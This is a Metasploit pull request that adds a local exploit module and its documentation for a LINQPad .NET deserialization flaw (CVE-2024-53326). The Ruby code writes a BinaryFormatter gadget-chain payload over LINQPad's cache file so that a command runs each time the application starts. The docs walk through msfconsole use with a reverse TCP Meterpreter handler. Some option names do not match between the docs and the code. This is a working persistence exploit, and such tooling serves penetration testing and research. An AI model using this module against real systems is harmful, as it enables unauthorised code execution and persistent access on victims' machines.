Merge pull request #19777 from msutovsky-r7/linqpad_deserialization

Linqpad deserialization persistence

Author: bwatters-r7

documentation/modules/exploit/windows/local/linqpad_deserialization.md

@@ -0,0 +1,55 @@
+## LINQPad 5.48 Deserialization
+
+LINQPad is a scratchpad for .NET programming. Versions prior to 5.52 contain a deserialization vulnerability in processing cache file when program is starting. Application can be downloaded from [here](https://www.linqpad.net/).
+
+## Verification Steps
+Steps:
+
+1. Install the application
+2. Start msfconsole
+3. Get Meterpreter/cmd shell
+4. Run: `use windows/local/linqpad_deserialization`
+5. Set payload - for example `set payload cmd/windows/generic` - and corresponding parameters
+5. Set parameters `session`, `cache_path`, `linqpad_path`, `cleanup`
+6. Run exploit
+
+## Options
+
+### cleanup
+
+Enable cleanup of malicious file. The module will replace cache filewith malicious content. If `cleanup` is enabled, after successful execution, the module will remove malicious cache file. The original file will be restored upon re-execution of Linqpad.
+
+
+### cache\_path
+
+The parameter sets path for folder, where vulnerable cache file is present. This is crucial part of the exploit as the folder can be used to identify whether the current version is vulnerable and the payload delivery is performed through cache file. 
+
+### linqpad\_path
+
+Final part of exploit runs the LINQPad to trigger deserialization procedure. The `linpad_path` parameter sets the path to LINQPad binary, which is ran at the end of exploit.
+
+Example:
+
+```
+msf6 > use exploit/multi/handler
+msf6 exploit(multi/handler) > set LHOST 192.168.95.128
+msf6 exploit(multi/handler) > set LPORT 4242
+msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
+msf6 exploit(multi/handler) > run
+[*] Started reverse TCP handler on 192.168.95.128:4242 
+[*] Meterpreter session 1 opened (192.168.95.128:4242 -> 192.168.95.130:53430) at 2024-12-30 12:46:16 +0100
+
+meterpreter > background
+[*] Backgrounding session 1...
+msf6 exploit(multi/handler) > use windows/local/linqpad_deserialization
+msf6 exploit(windows/local/linqpad_deserialization) > set LINQPAD_FILE C:/ProgramData/LINQPad/Updates50.AnyCPU/552/LINQPad.exe
+msf6 exploit(windows/local/linqpad_deserialization) > set payload windows/exec/cmd
+msf6 exploit(windows/local/linqpad_deserialization) > set cache_path C:/Users/ms/AppData/Local/LINQPad
+msf6 exploit(windows/local/linqpad_deserialization) > set CMD calc.exe
+msf6 exploit(windows/local/linqpad_deserialization) > set session 1
+msf6 exploit(windows/local/linqpad_deserialization) > exploit
+[*] Exploit completed, but no session was created.
+```
+
+Previous example will run `calc.exe` when LINQPad will start.
+

modules/exploits/windows/local/linqpad_deserialization_persistence.rb

@@ -0,0 +1,81 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = NormalRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html
+
+  # includes file?, directory?
+  include Msf::Post::File
+
+  # includes generate
+  include Msf::Util::DotNetDeserialization
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'LINQPad Deserialization Exploit',
+        'Description' => %q{
+          This module exploits a bug in LIQPad up to version 5.48.00. The bug is only exploitable in paid version of software. The core of a bug is cache file containing deserialized data, which attacker can overwrite with malicious payload. The data gets deserialized every time the app restarts.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'msutovsky-r7 <[email protected]>',
+          'James Williams' # original research
+        ],
+        'Platform' => 'win',
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Targets' => [[ 'Windows', { 'Arch' => ARCH_CMD } ]],
+        'Privileged' => true,
+        'References' => [
+          [ 'URL', 'https://trustedsec.com/blog/discovering-a-deserialization-vulnerability-in-linqpad'],
+          [ 'CVE', '2024-53326']
+        ],
+        'DisclosureDate' => '2024-12-03',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('LINQPAD_FILE', [true, 'Path to LINQPad executable on target\'s machine']),
+      OptString.new('CACHE_PATH', [true, 'Path to cache file directory containing deserialized data']),
+      OptBool.new('CLEANUP', [false, 'Restore original cache file when exploit finish'])
+    ])
+  end
+
+  # Simplify pulling the writable directory variable
+
+  def check
+    if datastore['LINQPAD_PATH'].blank? || !file?(datastore['LINQPAD_PATH'])
+      return Exploit::CheckCode::Unknown('LINQPad binary not specified or doesn\'t exist')
+    elsif datastore['CACHE_PATH'].blank? || !directory?(datastore['Cache_path']) || !file?(datastore['CACHE_PATH'] + '/autorefcache46.1.dat')
+      return Exploit::CheckCode::Unknown('Cache directory doesn\'t exist')
+    elsif !file?(datastore['CACHE_PATH'] + '/autorefcache46.1.dat')
+      return Exploit::CheckCode::Unknown('Cannot find cache file')
+    elsif file?(datastore['CACHE_PATH'] + '/autorefcache46.2.dat')
+      return Exploit::CheckCode::Safe('Contains not vulnerable version of LINQPad')
+    else
+      return Exploit::CheckCode::Vulnerable('LINPad and vulnerable cache file present, target possibly exploitable')
+    end
+  end
+
+  def exploit
+    # generate payload
+    dotnet_payload = ::Msf::Util::DotNetDeserialization.generate(
+      payload.encoded, # this is the Operating System command to run
+      gadget_chain: :TextFormattingRunProperties,
+      formatter: :BinaryFormatter
+    )
+    # try to overwrite cache file
+    fail_with(Failure::PayloadFailed, 'Writing payload to cache file failed') unless write_file(datastore['CACHE_PATH'] + '/AutoRefCache46.1.dat', dotnet_payload)
+
+    # add cleanup option
+    register_file_for_cleanup(datastore['CACHE_PATH']) if datastore['CLEANUP']
+  end
+end